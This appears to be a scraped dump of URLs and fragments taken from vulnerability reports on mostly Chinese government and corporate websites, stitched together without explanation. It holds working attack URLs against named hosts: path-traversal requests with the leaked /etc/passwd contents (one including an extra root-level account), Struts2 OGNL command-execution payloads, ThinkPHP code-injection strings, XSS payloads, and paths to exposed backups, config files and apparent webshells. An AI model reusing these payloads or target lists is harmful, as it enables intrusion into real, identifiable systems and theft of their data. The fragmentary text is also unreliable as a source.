http://www.huyigroup.com.cn/public/upload/uploadImage/2013/0920/13796701183325.jpg/.php IP:180.153.106.41 IP:180.153.106.42 http://renwu.hexun.com.tw/search.aspx?z=A http://data.quanshang.hexun.com.tw/zcxx/zcselect.aspx?name= http://125.91.6.66/ http://sp.mcc17.cn/index.action video.bnup.com/acenter/bottom.action http://101.36.88.180/index.action http://219.228.48.112:8080/acenter/index.action inurl:bottom.action‎ http://58.56.128.67/pc/pc.html http://58.56.128.67/manager http://www.koolearn.com/ http://dwgk.kflz.gov.cn/E_ReadNews.asp?NewsID=6551 http://oa5.hanweb.com/notice/admin/login/login.action http://oa6.hanweb.com/jact/admin/login/login.action http://demo.hanweb.com/jact/front/front_reg.action http://demo.hanweb.com/jact/front/front_mailstat.action http://demo.hanweb.com/jact/front/front_mailwrite.action site:hanweb.com filetype:action http://demo.hanweb.com/jact/1.txt http://lelink.lenovo.com.cn/ReadMe.txt http://ideaclub.lenovo.com.cn/forum/uc_server/admin.php http://e-learning.lenovo.com.cn/forum/forumdata/plugins/shell.lang.php http://www.oaj.cas.cn/web.rar http://about.58.com/complain/sendValidCodeAjax?phone=手机号码 http://office.caas.net.cn/list.asp?id=9367 http://office.caas.net.cn/list.asp?id=9367 www.oldcaas.net.cn http://www.9718.com/manage/manage.php http://www.9718.com/control/gallery.swf/.php http://www.9718.com/public/upload/img/1379733672.jpg/.php http://www.coolyun.com/common4.0/1.jsp http://www.coolyun.com/1.jsp http://58.56.128.81:8080 http://58.56.128.81:8080/login.jsp?userid=admin http://www.cashyd.ac.cn/login.asp http://3g.k.sohu.com/api/vm/view_comment.do?m=list&newsId=11669516 http://i.hjsm.tom.com/?c=user.book.mybook&a=comment&bookid=115315 http://i.hjsm.tom.com/index.php?c=user.book.chapter&a=mod&bookid=128388&volumeid=279735&chapterid=850240 http://project.ccidnet.com/cases/page/template/manufactuterData.do?method=searchCase&m_id=4500&classid=&appclass1=&appclass2=&keyword= http://project.ccidnet.com/cases/page/template/caseUserComment.do?method=getUserComment&c_id=1331 http://yjs.ciomp.ac.cn/data.rar http://show.aili.com/index.php?m=content&c=goods&a=goodsShow&gid=5071273无限评论 http://www.cefc.co/business.php?te=025&&type=002 http://113.108.100.168/ http://www.gzbhno.ac.cn/web.rar http://www.yitel.com/WebInfo/MemberActivityInfo.aspx?AcitvityID=21 http://yztoday.yznews.com.cn/yzjswmw/commentadmin.asp http://yztoday.yznews.com.cn/yzjswmw/write.asp http://www.scswl.cn/homepage.php/admin/member-profile http://mail.mos.gov.cn http://www.sbxcz.gov.cn/homepage.php/admin/member-profile http://8.7k7k.com/ http://8.7k7k.com/editThread.html?threadId=xxxx http://8.7k7k.com/listThread-barid-12-tid-303662.html http://8.7k7k.com/listThread-barid-12-tid-303670.html http://8.7k7k.com/editThread.html?threadId=303662 http://8.7k7k.com/editThread.html?threadId=303670 xlink:href没有过滤这是硬伤啊。接下来只要能让我插入math标签,这个问题基本上就算是解决了。 http://wh.vanke.com/bbs/ http://wh.vanke.com/bbs/login.asp http://www.sn.stats.gov.cn:7856/wsbs/17/detail5.jsp?contentId=1260 http://admin.baicai.com/ http://www.86gw.com/marry/set_index.php?action=set_memberstore&sid=165 http://www.86gw.com/marry/marryadmin/web/ http://www.86gw.com/marry/marryadmin/images/images1/1379826379_1379826379.php site:tencent.com http://isux.tencent.com/about http://isd.tencent.com/ http://impd.tencent.com/ http://isux.tencent.com/ http://flashteam.tencent.com/ http://cdc.tencent.com/ http://www.alloyteam.com www.alloyteam.com这台服务器没有加固,wp-login.php http://www.alloyteam.com/ http://www.wuhusrj.gov.cn/NewsDetail.aspx?pNewID=4764776 http://58.56.128.17:8888/ http://58.56.128.17:8888/public/ http://58.56.128.17:8888/project/bak/com/neukingstone/common/里也有java的源码 http://58.56.128.17:8888/common/ http://58.56.128.17:8888/common/deptduty.jsp http://58.56.128.17:8888/project/bak/com/neukingstone/ http://58.56.128.17:8888/project/bak/com/neukingstone/util/DAO.java~1~ http://58.56.128.17:8888/common/selmultiman.jsp http://58.56.128.17:8888/common/selmultiman.jsp?userGroup=2 http://58.56.128.139:9999 http://58.56.128.139:9999/dev_password.php http://58.56.128.139:9999/user_rapid_bind.php http://58.56.128.139:9999/php/WebDocList.php http://58.56.128.139:9999/auditfile/ http://58.56.128.139:9999/config/ http://58.56.128.139:9999/.svn/ http://nc.vanke.com/webserver/indexnew.aspx?classid=1 http://szvkh.vanke.com/house/albums01.aspx?hid=2 http://szvkh.vanke.com/house/albums01.aspx?hid=2 http://mail.nwsuaf.edu.cn/web2/main.html?session_key=********&user=******_nwsuaf_edu_cn data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+ http://bbs.fc.xunlei.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://www.dlbestcity.gov.cn/?page=details&id=654&categoryid=22 http://www.dlbestcity.gov.cn/admin/login.asp后台登陆地址 http://www.ikuai8.com/helplist.php http://www.ikuai8.com/web.zip http://www.ikuai8.com/111.php http://www.ikuai8.com/conf.php http://admin.baicai.com/system/feedback/feedback-edit.php?fid=24954 http://auth.baihe.com/id5/sendAuthId5.action?authedFrom=0需要登录 http://legc.lenovo.com http://legc.lenovo.com/lefactory/staticContent?type=originalAvatar&filename=../../../../etc/passwd http://www.ah-gree.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://m.so.com/index.php?a=transcode&m=b6fd8a40b712b8a76468f304f577dd56dd1dd3dc&u=http://www.yinyuetai.com/fanclub/22594&q=exo&pn=1 IP:115.182.21.5 www.ccidnet.com IP:115.182.21.11 IP:115.182.21.15 www.ccidedu.com IP:115.182.21.22 IP:115.182.21.40 www.ccidreport.com http://search.cnipr.com/pages!advSearch.action http://chuang.yicai.com/space.php?do=thread&uid=268214&tid=178783&peopleid=master&id=178783 http://www.xingshan.gov.cn/cms/webback/Login.action http://bfmz.0375.com/bfmz.rar http://www.bfmz.gov.cn/ http://www.youyouwin.com/dev/games/play/id/125974?xmlFolder=http://www.youyouwin.com/xml http://www.gdpe.cn/ http://fy.hnsfj.gov.cn/ahsffyww/Default.action http://www.360sky.com/youxizx.jsp?classid=20&fileid=9343095 http://www.360sky.com/download/games.jsp?classid=19 http://www.360sky.com/moregame.jsp?pages=1&typeid=226 http://sd.bbs.house.sina.com.cn/bbs/forum/albumshow/?fid=1408886712113880 http://smtp.mop.com/extmail/cgi/index.cgi http://www.wap1934.com/ http://www.bzsmzj.gov.cn/ http://www.bomaitech.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://www.ahboquan.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ2dvb2Qgam9iJyk7PC9zY3JpcHQ+PC9zdmc+ http://www.sqzfcg.gov.cn/admin/ http://www.12371.rzdj.gov.cn/portal/dwgl/portal-dwgl.action http://www.hnnx.com http://www.hnnx.com/sysadmin/editor/admin/login.jsp http://www.hnnx.com/upload/201309/20130923155357674.jsp http://www.chinashippinginfo.net/framesub/curve_demo.aspx?indextypeid=6 GHDBinurl:doc/page/login.asp http://www.scsnmz.gov.cn/data.rar http://mzj.qzlc.gov.cn/1.rar http://drops.wooyun.org/webview.html http://www.butao.com/biz/signup.php?step= ubuntu:/tmp$ PHPREDIS_SESSION:htioc1de81mpn186enogjmp2o7 http://dev.duoshuo.com/";s:3:"sso";i:0;}login_referer|s:23:"http://dev.duoshuo.com/";expire_check|i:1379999870 redis_version:2.6.7 redis_git_sha1:00000000 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.7.2 process_id:31597 run_id:63c0e3afd59fb79c433352120e98cc153720aebe tcp_port:6379 uptime_in_seconds:7742630 lru_clock:1685114 connected_clients:420 used_memory:761047736 used_memory_human:725.79M used_memory_rss:820125696 used_memory_peak:939262296 used_memory_peak_human:895.75M used_memory_lua:31744 mem_fragmentation_ratio:1.08 mem_allocator:jemalloc-3.0.0 rdb_changes_since_last_save:96044 rdb_last_save_time:1379999912 total_connections_received:5813336406 total_commands_processed:11626595357 instantaneous_ops_per_sec:5764 expired_keys:1844913653 keyspace_hits:3961937815 keyspace_misses:1851335123 latest_fork_usec:44840 role:master used_cpu_sys:951291.94 used_cpu_user:465259.50 used_cpu_sys_children:63797.91 used_cpu_user_children:337456.16 db0:keys=1311659,expires=1311533 db1:keys=395670,expires=0 http://hd.bjsme.gov.cn:8080/index.action www.gzdaj.gov.cn/gzjy/runroom.action www.xanet110.com/default/_ www.xanet110.com/default/User_BA_Manage_edit.aspxID=9863& http://211.103.158.26/ http://211.103.158.26/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin mswap:x:500:500:mswap:/home/mswap:/bin/bash http://211.103.158.26/smenu.php?menu=../../../../../../../../../../etc/resolv.conf%00.jpg http://211.103.158.26/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg http://www.ahszmz.gov.cn/ahszmz.rar http://www.158pe.com/var/usp/webapps/onestopen/?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://www.cccc-jjgs.com/ViewArticle.aspx?ID=45047 http://fyqc.app.cnsaas.com/ http://www.xigou100.com/sns/ http://www.jnsgzw.com/web.rar http://www.forestry.gov.cn/DownloadFile.jsp?filename=../WEB-INF/web.xml http://www.forestry.gov.cn/DownloadFile.jsp?filename=../WEB-INF/ccmcms.properties http://www.baoji.gov.cn/DownloadFile.jsp?filename=../WEB-INF/ccmcms.properties http://www.baoji.gov.cn/ccmbam/upload/upload.jsp http://www.sxgxt.gov.cn/AccountAction.do?dispatch=listAccount http://www.sxpop.gov.cn/AccountAction.do?dispatch=addAccountjump&cmsuserid=1 http://www.sxpop.gov.cn/indexAction.do?dispatch=AccountLogin http://www.forestry.gov.cn/DBAction.do?dispatch=exportTable http://yjb.shaanxi.gov.cn/DBAction.do?dispatch=exportTable http://www.ourfuture.cn/TemplateAction.do?dispatch=listTemplate http://www.ourfuture.cn/WebSiteAction.do?dispatch=listWebsite http://www.ourfuture.cn/UsersInfoAction.do?dispatch=usersInfoList http://www.yl.gov.cn/search.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://admin.tzjt.gov.cn/admin/login.action http://mail.swsc.com.cn/ http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/httpd/conf/httpd.conf http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/resolv.conf http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/passwd http://mail.swsc.com.cn/?tn=../../../../../../../../../../proc/version http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/sysconfig/iptables-config http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0 http://www.czdmw.gov.cn/index.action http://bbs.17173.com inurl:bbs.17173.com/space http://www.baidajob.com/advisor/article/detail?article_id=15 http://www.baidajob.com/advisor/article/detail?article_id=15 http://www.dji.com/wp-config.php.bak http://www.dji.com/config.php http://wenku.115.com/index.php?ct=doc&ac=search&key http://www.wasu.cn/.svn/entries http://www.jagzw.gov.cn/cn.rar http://wuhan.whhd.gov.cn/info/gszx/gmjj.jsp http://wuhan.whhd.gov.cn/info/gszx/wstz.jsp http://www.mbclpresscenter.com.cn/admin/Default.aspx http://tct.tcsos.com/ http://snap.chinaren.com/resin-admin/ file:///mnt/sdcard/hehe.html。向欧鹏浏览器发送请求要求打开一个页面时,即可触发 http://www.autren.com:80/en/seach.aspx?key= http://www.sense-idea.com/Install/ http://www.sense-idea.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://www.rz.gov.cn/rzgov.rar http://www.lystyj.gov.cn/textdetail.php?ID=568 http://t.jiapin.com/second/catindex?cat_id=2 http://www.lhmzj.gov.cn/ http://www.sdty.gov.cn/bak.rar http://show.tom.com/.svn/entries http://game.tom.com/.svn/entries http://image.637.tom.com/root/software/log.txt http://image.637.tom.com/manager/html http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.wooyun.org/ file:///mnt/sdcard/hehe.html。向傲游浏览器发送请求要求打开一个页面时,即可触发 http://218.58.70.132/admin/ http://www.wzmzw.gov.cn/wwwroot.rar http://scm.vipshop.com/bak/scm.war http://scm.vipshop.com/jit/jit_orderlist.jsp http://scm.vipshop.com/system/userinfo/list.jsp http://scm.vipshop.com/scm/middle.jsp http://www.hnlsj.gov.cn/1.rar http://www.hnchangning.gov.cn/wwwroot.rar http://ht.7k7k.net/login http://218.58.70.196/ http://my.xcar.com.cn/ajax/ajax_friend.php http://app.114la.com/?q=88952634 http://i.36kr.net/user/uid/22834 http://www.ynld.gov.cn/wwwroot.rar http://www.wangfujing.com/emall/.svn/entries http://www.wangfujing.com/webapp/wcs/stores/.svn/entries http://www.yncn.gov.cn/web.rar http://www.chinashippinginfo.net/web.rar http://www.px.gov.cn/bak.rar http://kychat.koyoo.cn/TaskService/webChatAndLeaveWord.action http://www.yixian.gov.cn/root.zip http://login.360.cn/?o=sso&m=info&func=QiUserJsonP1380012848446&show_name_flag=1关注 http://tao.360.cn/f_user_shop_api.html?shopid=2030&mod=del取消关注 http://bbs.tuniu.com/ http://bbs.tuniu.com/forum.php?mod=attachment&findpost=ss&aid=1 http://lecture.pku.edu.cn/video1/video.php?id=1399 http://116.204.96.235/admin.php http://donation.onefoundation.cn/,于是测试之,admin账户已经被锁定,但是我们有editor账户 http://116.204.96.235/admin.php http://www.ziteng.tv/zvAction!toCustomer http://www.ziteng.tv/zvAction!toCustomer www.ziteng.tv/ROOT/ http://service.allinpay.com:8080/ www.hao123.com的页面看到的,广告你都打到哪里了,怎么这么低级的漏洞都存在,几处反射型的xss跟存储型的xss,由于过了好久了,今天去xss平台才看到的,他们管理员好懒,都快半个月了才审核出来。。 www.kstong.net在同一个ip上 www.kstong.net居然在一台服务器上,而且通过img.kstong.net居然能够读取www.kstong.net所有源代码。这个域名下怎么就不解析呢,这是肿么一回事,我也没搞懂呀!随便展示2个吧!! http://center.wenxue24.com/lesson/Lesson_Class_info.asp?id=110019039007210735&Type=2&nocache=1379422030623 http://www.cwca.com.cn/indexSiteMapAction!list.action http://8.7k7k.com/ http://money.finance.sina.com.cn/q/view/FinanceCase.php?=88952634&age=1&fmy_ct=1&fmy_ic=1 http://inn1000.com/News-list.php?id=3 http://www.inn1000.com/config/ http://www.inn1000.com/page/ http://www.inn1000.com/admin/default.php http://www.store.cn/index.php?m=maillist&act=city&cityid=beijing http://med.tcl.com/admincp.php http://bit.tcl.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php http://www.wujiok.com/无极在线 http://sjr.sh.gov.cn/1.rar http://www.12318.gov.cn/manager/wljb/viewJbinfo.action?jbId=5,575,817存在最新struts2漏洞,可以直接执行命令,通过添加用户直接进入服务器 http://oa.huapu.com/c6/JHSoft.Web.Login/ http://oa.huapu.com/c6/Jhsoft.Web.login/PassWord.aspx http://www.jnfyw.gov.cn/ww1.rar http://www.nzjcy.gov.cn/nzjcy.rar http://www.ycsjcy.gov.cn/web.rar http://gls.tcl.com/login.aspx http://www.haiercrm.com http://big5.tcl.com/DRP/login.action http://sgdatabase.unwomen.org/home.action http://www.happy-g.com.cn/app/yy_home.action http://[马赛克].com/hy_hyxx.asp http://[马赛克].com/hy_hyxx.asp http://www.ccsnw.gov.cn/ http://www.msg189.com/userLogin.action http://www.msg189.com/css.jsp http://www.msg189.com/manageLogin.jsp http://www.msg189.com/userLogin.action http://www.pxagri.gov.cn/pxagri.zip http://www.xggxq.gov.cn/web.rar http://www.scmb.gov.cn/wwwroot.rar http://www.yeda.gov.cn/yeda.rar http://xxcyj.jingmen.gov.cn/xxcyj.rar http://sy.czbanbantong.com/index.action http://gbook.gscn.com.cn/liebiao.php?yid=86 http://www.chwgx.gov.cn/chwgx.rar http://www.hedalu.gov.cn/index.action http://www.smartercu.com/tmp/index.action http://bnz.cq.gov.cn/bnz.cq.gov.cn.rar http://www.sqagri.gov.cn/database.rar http://sport.maoming.gov.cn/db.rar http://www.zsb.pudong-edu.sh.cn/CenterWeb/gkxx/info.asp?id=1261 http://www.365fanyi.com/ http://www.lbny.gov.cn/www.rar http://www.jxycagri.gov.cn/web.rar http://cbj.sh.gov.cn http://wgxj.hx.gov.cn/wwwroot.zip http://www.rdagri.gov.cn/www.rdagri.gov.cn.rar http://www.mxagri.gov.cn/web.rar http://www.smag.gov.cn/admin.rar http://www.qzymj.gov.cn http://www.qzymj.gov.cn/fuck.asp http://www.qzymj.gov.cn/80sec.asp http://www.qzymj.gov.cn/dama.aspx http://www.qzymj.gov.cn/r00ts.aspx http://tzy.zynews.com/index.php?action=index&hot=9 http://www.xj-agri.gov.cn/web.zip http://tour.zynews.com/ http://tour.zynews.com/car/jiejiline.asp?startregionid=5931&endregionid=483 http://tour.zynews.com/car/songjiline.asp?startregionid=483&endregionid=5931 http://tour.zynews.com/car/shangwu.asp?cityid=321 http://tour.zynews.com/hotel/station.asp?cityid=53&labelid=21922&order_s=distance&page=0 http://url.114la.com/?ac=url_details&id=85567 www.uwan.com http://qx.uwan.com/data/mysql_error_trace.inc http://qx.uwan.com/ http://qx.uwan.com/qx_uwan_admin/login.php http://lun.uwan.com/lun_uwan_admin/login.php http://wz.uwan.com/wz_uwan_admin/login.php http://xia.uwan.com/xia_uwan_admin/login.php http://tvs.tcl.com/admin/admin.rar可直接下载源代码 http://smarthome.tcl.com/manager/ http://www.sxfs.gov.cn/1.rar http://www.smgt.gov.cn/smgt.rar http://www.motel168.com/ShowHotelImage.aspx?type=1 http://www.hagt.gov.cn/wwwroot.rar http://www.scncaj.gov.cn/data.rar http://aqjd.kscein.gov.cn/bak/web.rar http://www.zjajj.gov.cn/db.zip http://www.jnzfcg.gov.cn/root.zip http://218.30.21.104/jfpt_akzyjsxy/logon.action http://218.30.21.104/jfpt_akzyjsxy/jfpt_test.jsp http://hi.189.cn/service/bill/accountBill_product.jsp?prodnum=88359543&prodcode=167987957&month=201305&querymod=2&citycode=0898&prodid=1 http://hi.189.cn/service/bill/accountBill_product.jsp?prodnum=88359563&prodcode=167987957&month=201305&querymod=2&citycode=0898&prodid=1 http://www.dzgt.gov.cn/dzgt.rar http://www.bhgtj.gov.cn/data.rar http://gtzy.gongyi.gov.cn/gtzy.rar http://www.jxgtzyj.gov.cn/1.rar http://ezguotu.ezhou.gov.cn/database.rar http://www.zcajj.gov.cn/zcajj.rar http://www.syland.gov.cn/syland.rar http://www.hebigt.gov.cn/2.rar http://www.hyxgtj.gov.cn/web.rar http://61.158.236.33:8080/phy/index.do site:shenzhoufu.com http://www.xtxgtj.gov.cn/www.xtxgtj.gov.cn.rar http://www.xinzhoulr.gov.cn/root.zip http://www.ahtcgtj.gov.cn/ahtcgtj.rar http://www.binzhouipo.gov.cn/web.rar http://www.jnzj.gov.cn/wwwroot.zip http://www.jnzj.gov.cn/inc.asp http://home.fenggang.gov.cn/home.rar http://job.tianji.com/resume/campaign/register/310%3A3775716 http://www.pzhmf.gov.cn/data.rar http://www.gzjssafety.gov.cn/2.rar http://www.ycfcglj.gov.cn/wwwroot.rar http://ajj.jiangyin.gov.cn/bak.rar http://www.czfdc.gov.cn/data.rar http://www.lxrf.gov.cn/lxrf.rar http://www.srsrf.gov.cn/srsrf.zip http://www.lyghbc.gov.cn/lyghbc.rar http://user.sanwen8.cn/do/postmessage?tuid=223669 http://jswater.jinshan.gov.cn/jswater.jinshan.gov.cn.rar http://www.jnnj.gov.cn/data.rar http://en.ex-silver.com/products.php?id=1 http://en.ex-silver.com/system/ http://www.ncosm.gov.cn/ncosm.rar http://phpweb.99idc.cn/webmall/query.php?catid=1 http://fzgl.fjzfcg.gov.cn/2.rar http://kjrck.cstc.gov.cn/index.do http://ehr.tcl.com/ehr http://ehr.tcl.com/ehr?Pswrd=a&Pernr=a http://cts.tcl.com/,围观绩效? http://121.193.130.60/cetphoto/photo/3013201001.jpg http://fhyf.kmjy.gov.cn/wwwroot.zip http://118.145.26.210/feature/showTimeByCineam.aspx?placeNO=11064201&Date=2013-09-28 http://szyb.hyyb.gov.cn/szyb.rar http://www.zssf.gov.cn/1.rar http://www.ybnj.gov.cn/ybnj.rar http://www.hbsea.gov.cn/database.zip http://mall.baomihua.com/person/address.aspx?id=1550 http://test.baidu.com/crowdtest/n/bug/index/proid/5027 http://www.zjda.gov.cn:83/gate/big5/www.80sec.com/ http://www.hljts.gov.cn/web/ http://www.qgnet.gov.cn/gfql http://www.wsxtj.gov.cn/images/includes.asp?tid_%A1%BE%D5%FD%C6%B7%A1%BFlamp%BC%BC%CA%F5%BE%AB%C6%B7%CA%E9%C0%C8%A3%BAapache%C4%A3%BF%E9%BF%AA%B7%A2%D6%B8%C4%CF%20%2Fnickkew%D5%C5%C1%A2%C7%BF.htm http://www.lndangan.gov.cn/yydj1/ http://www.hffx.gov.cn/images/ http://service.whst.gov.cn:81/。所有网站整站备份,重要数据泄漏。 http://www.yxjcy.gov.cn/manager/ http://218.204.223.135/Home/Login?ReturnUrl=%2f http://218.14.88.20/DRP/login.action(TCL员工直销订单管理系统) http://218.14.88.9/DRP/login.action(商用系统分销资源管理系统5.0) http://218.14.88.13/DRP/login.action(ROWA分销资源管理系统5.0) http://ah.189.cn/shop/userCenter/myAddress!initUpdate.action?deliveryAddress.id=1738172 http://application.dodopal.com:9997/fapayn/querybill.action http://www.tcl.com/service/qut/p/qut.html http://www.tcl.com/service/qut/p/qut.html http://www.mhaier.cn/jxs_query/page.action http://learning.ceair.com http://learning.ceair.com/ilearn/en/learner/jsp/user_home/jsp/my_underling_details.jsp?id=100227 http://office.homeinns.com/staffinfo/ http://office.homeinns.com/staffinfo/hrDetail.aspx?Type=8 www.homeinns.com/ewebeditor/admin/login.jsp http://sz.esf.sina.com.cn/ad?p=100 http://b2b.zon100.com http://cglogin.zon100.com http://club.zon100.com http://gys.zon100.com http://login.zon100.com http://member.zon100.com http://wap.zon100.com http://b2b.zon100.com http://cglogin.zon100.com http://club.zon100.com http://gys.zon100.com http://login.zon100.com http://member.zon100.com http://wap.zon100.com http://login.zon100.com/member/loginAction_toLogin.do http://cglogin.zon100.com/front/detailZ-getDetailZs.do http://sqsvc.btte.net/self-service/udr.do?method=QueryForList http://points.zon100.com/points/pointsAction_mall.do http://tp2.sinaimg.cn/ http://2.eboss.cn/ http://www.fengyunzhibo.com/,打开源码,发现用的是云成互动的服务。于是手贱打开了下。发现了这个漏洞。 http://www.kukuplay.com/imgup/ http://static.ws.kukuplay.com/imgup//help.php http://appstore.gk.sdo.com http://www.zon100.com/product/priceAdvice.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin bingdao:x:0:0:root:/home/bingdao:/bin/bash http://ehr.91yong.com/html/user/login.html http://121.207.254.153/1.0v/rccool/login.html http://yglz.tousu.hebnews.cn/Outside/msglist_s.aspx?mt=1 http://223.252.192.37/ https://online.unionpay.com/new-pandora/t1/showPage.do https://partner.maxthon.com/index.php https://partner.maxthon.com/index.php?type_black=Y&type_white=&index=2&keyword=edu https://partner.maxthon.com/index.php?type_black=Y&type_white=&index=2&keyword=edu http://partner.maxthon.com/rnd.action http://data.sports.sohu.com http://ecard.gdbnet.cn/login.jspx http://ecard.gdbnet.cn/css.jsp http://ecard.gdbnet.cn/login.jspx http://code.fangwei315.com/caimacode.aspx?key=123456789090 https://42.96.192.111/backup/ http://blog.mrobay.com/blog/wp-login.php http://passport.58.com https://42.96.192.111/backup/ http://www.qgrmbszx.cn/indexAction.action http://u.china.com/group/?_a=taglist_group&node_type=4 http://www.china-crc.com.cn/index.php/changpiandg/detail/pid/08/id/8 http://www.china-crc.com.cn/index.php/changpiandg/detail/pid/08/id/8 http://job.gome.com.cn/ www.dangao.com/help.php http://123.234.41.57/ http://112.64.122.203/meeting/app/meetinglist/todayDataList.action?site=box&portalLocale=zh_CN&menuname=24000_24001_24002 